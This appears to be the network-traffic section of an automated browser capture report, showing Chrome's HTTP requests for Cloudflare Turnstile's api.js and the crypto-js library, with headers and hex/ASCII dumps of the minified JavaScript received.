                                                                                                                                                                                                                            2025-02-11 15:27:12 UTC1369INData Raw: 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69
                                                                                                                                                                                                                            Data Ascii: uffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringi
                                                                                                                                                                                                                            2025-02-11 15:27:12 UTC1369INData Raw: 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c
                                                                                                                                                                                                                            Data Ascii: =r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKL
                                                                                                                                                                                                                            2025-02-11 15:27:12 UTC1369INData Raw: 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f
                                                                                                                                                                                                                            Data Ascii: abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o
                                                                                                                                                                                                                            2025-02-11 15:27:12 UTC1369INData Raw: 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c
                                                                                                                                                                                                                            Data Ascii: [39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            10192.168.2.649745104.18.95.414436820C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC649OUTGET /turnstile/v0/g/8a57887573f2/api.js HTTP/1.1
                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                            Referer: https://8l.dichotomou8.com/
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 11 Feb 2025 15:27:13 GMT
                                                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 48130
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                                            last-modified: Tue, 04 Feb 2025 13:03:14 GMT
                                                                                                                                                                                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 91055c9b7d65425f-EWR
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                            Data Ascii: "use strict";(function(){function Ht(e,t,a,o,c,l,g){try{var h=e[l](g),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75
                                                                                                                                                                                                                            Data Ascii: e}function Sr(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 71 74 28 65 29 7c 7c 7a 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 56 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                                                                                                                                                            Data Ascii: ray$/.test(a))return ot(e,t)}}function Se(e,t){return qt(e)||zt(e,t)||Xt(e,t)||Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ve(e,t){var a={label:0,sent:function(){if(l[0
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                                                                                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var Pe=300030;var We=300031;var j;(fu
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC1369INData Raw: 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 65 65 7c 7c 28 65 65 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 6d 65 3b
                                                                                                                                                                                                                            Data Ascii: R="never",e.MANUAL="manual",e.AUTO="auto"})(ee||(ee={}));var ce;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ce||(ce={}));var Q;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(Q||(Q={}));var me;
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC1369INData Raw: 22 73 74 72 69 6e 67 22 26 26 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 4c 2e 4e 4f 52 4d 41 4c 2c 4c 2e 43 4f 4d 50 41 43 54 2c 4c 2e 49 4e 56 49 53 49 42 4c 45 2c 4c 2e 46 4c 45 58 49 42 4c 45 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 6b 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75
                                                                                                                                                                                                                            Data Ascii: "string"&&Nr.test(e)}function pt(e){return M([L.NORMAL,L.COMPACT,L.INVISIBLE,L.FLEXIBLE],e)}function vt(e){return M(["auto","manual","never"],e)}function mt(e){return M(["auto","manual","never"],e)}var kr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e){retu
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC1369INData Raw: 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 67 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 49 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22 66 62 44 22 3a 22 66 62 45 22 3b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 73 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 70 2c 22 74 75 72 6e 73 74 69 6c 65 2f 69 66 2f 6f 76
                                                                                                                                                                                                                            Data Ascii: o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,g,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",I=a["feedback-enabled"]===!1?"fbD":"fbE";return"".concat(s,"/cdn-cgi/challenge-platform/").concat(p,"turnstile/if/ov
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC1369INData Raw: 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 74 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 29 7b 69 66 28 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 3d 3d 22 75 6e 64 65 66 69 6e 65
                                                                                                                                                                                                                            Data Ascii: if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,writable:!0,configurable:!0}}),t&&te(e,t)}function ze(){if(typeof Reflect=="undefine
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC1369INData Raw: 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 71 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 7a 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 73 72 28 74 68 69 73 2c 63 29 7d 7d 76 61 72 20 66 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 75 72 28 61 2c 65 29 3b 76 61 72 20 74 3d 64 72 28 61 29 3b
                                                                                                                                                                                                                            Data Ascii: eof t=="function")?t:qe(e)}function dr(e){var t=ze();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this,arguments);return sr(this,c)}}var fr=function(e){"use strict";ur(a,e);var t=dr(a);
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC1369INData Raw: 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 6c 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 29 3b 74 2e 77 72 61 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 6d 28 22 43 61 6e 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 20 57 69 64 67 65 74 2c 20 45 6c 65 6d 65 6e 74 20 6e 6f 74 20 66 6f 75 6e 64 20 28 23 22 2e 63 6f 6e 63 61 74 28
                                                                                                                                                                                                                            Data Ascii: -cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((l=t.params.theme)!==null&&l!==void 0?l:t.theme,"/").concat(a);t.wrapper.parentNode||m("Cannot initialize Widget, Element not found (#".concat(


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            11192.168.2.649746104.17.24.144436820C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                            Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC959INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 11 Feb 2025 15:27:13 GMT
                                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                            ETag: W/"61182885-40eb"
                                                                                                                                                                                                                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                                                                                                            cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                            Age: 1655506
                                                                                                                                                                                                                            Expires: Sun, 01 Feb 2026 15:27:13 GMT
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hgY4iCalCgDWZlw9AY3UNV8A5OxgMCafYGgeCByU4Et9QYhvK4HSaDEbU09Vugd%2BSpEeSDEpXscQUFt8haYglWnTnUPwWdsmhp5xrQ%2Fq8p9ReTchicvlNAEiy3K6EYBJLZOmj7%2Bk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 91055c9c091b8ca7-EWR
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            2025-02-11 15:27:13 UTC410INData Raw: 33 39 37 36 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                                                                                                            Data Ascii: 3976!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
